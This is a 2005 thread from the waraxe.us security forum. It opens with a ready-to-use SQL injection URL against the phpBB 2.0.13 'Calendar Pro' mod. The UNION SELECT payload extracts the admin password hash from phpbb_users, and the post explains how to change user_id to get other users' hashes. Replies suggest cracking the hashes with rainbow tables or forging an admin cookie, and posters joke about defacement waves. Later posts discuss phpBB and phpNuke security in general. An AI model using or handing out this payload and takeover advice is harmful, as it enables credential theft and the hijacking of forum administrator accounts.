Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
September 19, 2019
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 242
Members: 0
Total: 242
PacketStorm News
Currently there is a problem with headlines from this site
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> Another one! Phpbb 2.0.13 + Calendar Mod
Post new topic  Reply to topic View previous topic :: View next topic 
Another one! Phpbb 2.0.13 + Calendar Mod
PostPosted: Tue Apr 05, 2005 10:11 pm Reply with quote
murdock
Advanced user
Advanced user
 
Joined: Mar 16, 2005
Posts: 54




Another SQL injection discovered in another mod for phpbb 2.0.13, published at milw0rm's page and found by Cerebrums again.
Now seems to be the in the "Calendar Pro" mod (NOTE: Not the "Topic Calendar" mod!).

Here's the exploit:

http://www.milw0rm.com/id.php?id=910

But, once again, I prefer to simply paste the injection url in the browser:

Code:
http://[target]/[phpbb_folder]/cal_view_month.php?month=04&year=2005&category=-1%20UNION%20SELECT%20user_password%20FROM%20phpbb_users%20where%20user_id=2/*


This one give's the admin password hash, simply change the "user_id=" number to get the hash of another user.

I made a screenshot to view where appears the hash in the page if the exploit worked: Screenshot

Salut!
View user's profile Send private message
Re: Another one! Phpbb 2.0.13 + Calendar Mod
PostPosted: Wed Apr 06, 2005 3:08 am Reply with quote
xtremeshell
Regular user
Regular user
 
Joined: Mar 21, 2005
Posts: 6
Location: Somewhere In Hell !!




"This one give's the admin password hash, simply change the "user_id=" number to get the hash of another user. "
=================================================
After I have the admin hass, How do I crack it ?? ( Sorry for my stupid questions ) Should I use some software ?? such as JTR ?? Or Simply, how to exploit the admin panel with that admin hass ???

thX
View user's profile Send private message
PostPosted: Wed Apr 06, 2005 7:25 am Reply with quote
murdock
Advanced user
Advanced user
 
Joined: Mar 16, 2005
Posts: 54




You can try to crack it using Rainbow Tables, or simply making a cookie to log as admin (look at the first pinned topic in this forum!).
View user's profile Send private message
PostPosted: Wed Apr 06, 2005 8:11 am Reply with quote
xtremeshell
Regular user
Regular user
 
Joined: Mar 21, 2005
Posts: 6
Location: Somewhere In Hell !!




murdock wrote:
You can try to crack it using Rainbow Tables, or simply making a cookie to log as admin (look at the first pinned topic in this forum!).


Mm.... Rainbow Tables ?? Smile I'll find it.... And maybe I'll prefer to use the hash as a cookie maybe ?? hehehhehehehe.... Well, let's go !!

Thx for the rept Smile
View user's profile Send private message
PostPosted: Wed Apr 06, 2005 11:45 am Reply with quote
shai-tan
Valuable expert
Valuable expert
 
Joined: Feb 22, 2005
Posts: 477




Why cant people just put their time into phpBB itself. Theres not many sites that Ive seen that use the calender and download mods. Everyone is happy if there is an exploit for 2.0.13 itself... well except the victims.

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Wed Apr 06, 2005 12:58 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




shai-tan wrote:
...
Everyone is happy if there is an exploit for 2.0.13 itself... well except the victims.
Laughing

Yeah, sure, that webmasters and admins are not pleased with new defacement waves Very Happy

Anyway - phpbb is allready very researched piece of software and new security holes are more and more hard to find Wink
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Apr 06, 2005 1:15 pm Reply with quote
shai-tan
Valuable expert
Valuable expert
 
Joined: Feb 22, 2005
Posts: 477




Yes well we are just going to have to wait till 3.0 comes out Twisted Evil ....I remember all the posts long ago about how secure 2.0.0 was going to be...... now look at it..... Laughing

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Wed Apr 06, 2005 2:28 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Yep, all the new, rewritten from scratch versions are good target for security audit, thats true Cool
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Apr 06, 2005 3:03 pm Reply with quote
y3dips
Valuable expert
Valuable expert
 
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




waraxe wrote:

Anyway - phpbb is allready very researched piece of software and new security holes are more and more hard to find Wink


yes, ive seen so many security holes beeing found at PHPbb, but now i think it more n more secure , because there are so many fix since it was born , lol

so , now the attacking will against the module in the phorum
like PHPnuke i think Rolling Eyes

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Fri Apr 08, 2005 12:25 pm Reply with quote
shai-tan
Valuable expert
Valuable expert
 
Joined: Feb 22, 2005
Posts: 477




Yes phpNuke I think is in for a exploit spell. Its too big. Small and simple things are always the most secure Wink

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Fri Apr 08, 2005 3:02 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




shai-tan wrote:
Yes phpNuke I think is in for a exploit spell. Its too big. Small and simple things are always the most secure Wink


Phpnuke is really amazing piece of software - very big and strong community, very ineffective and insecure coding (kinda bloatware). It contains many-many legacy code fragments, absolutely not used novadays. And whats more bad - all those add-ons and stuff - most of them are examples of insecure coding. There are good derivations of the phpnuke - like cpgnuke and stuff, but i think, its time to rewrite phpnuke from scratch - why not as version 8.0 Idea
By the way - i use phpnuke myself (as you all can see Cool ) and its my own derivation, so called "waraxe edition". I was optimizing nuke core engine and all the modules and perfomance was growing 200%-300%.
Just look at page generation times and compare it to other, classical nuke sites Very Happy
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Fri Apr 08, 2005 3:19 pm Reply with quote
wyk
Regular user
Regular user
 
Joined: Mar 15, 2005
Posts: 10




waraxe, are you ready to share this derivation with others?
View user's profile Send private message Visit poster's website
PostPosted: Fri Apr 08, 2005 3:35 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




wyk wrote:
waraxe, are you ready to share this derivation with others?


It's on early stage. Still i have not finished modules "downloads", "weblinks" and "votes". And there is more stuff to finish. Maybe i will release it near future, let's see.
But one thing is sure - my nuke derivation is meant to be as secure as possible (for nuke Very Happy ). Right now there is implemented countermeasures against path disclosure, some obstacles against sql injections and all the suspicious activity and all the internal errors will be logged. And so far - from janyary 2005 - it is not fallen apart yet Smile
So seems that waraxe edition alpha release is coming out before summer 2005 Wink
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Fri Apr 08, 2005 4:40 pm Reply with quote
y3dips
Valuable expert
Valuable expert
 
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




i just think about that sometimes coz we all know phpnuke has a big community, why dont phpnuke make a restriction of module, or maybe all the include module should have some 'security test' and permit from them

waraxe: about your own modification , i think it would be great if u can share it.. n better if u post one to "php nuke' developer so they could learn it.. cant wait for it

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Sat Apr 09, 2005 4:53 am Reply with quote
shai-tan
Valuable expert
Valuable expert
 
Joined: Feb 22, 2005
Posts: 477




Yes it will be very popular. I want a beta now to be honest.
Why not call it Php-Waraxe-Nuke or just Waraxe-Nuke. Then we can tell Php-Nuke.org to shove 8.0 up their A*s

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
Another one! Phpbb 2.0.13 + Calendar Mod
  www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






Game Hints
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe"
Page Generation: 0.094 Seconds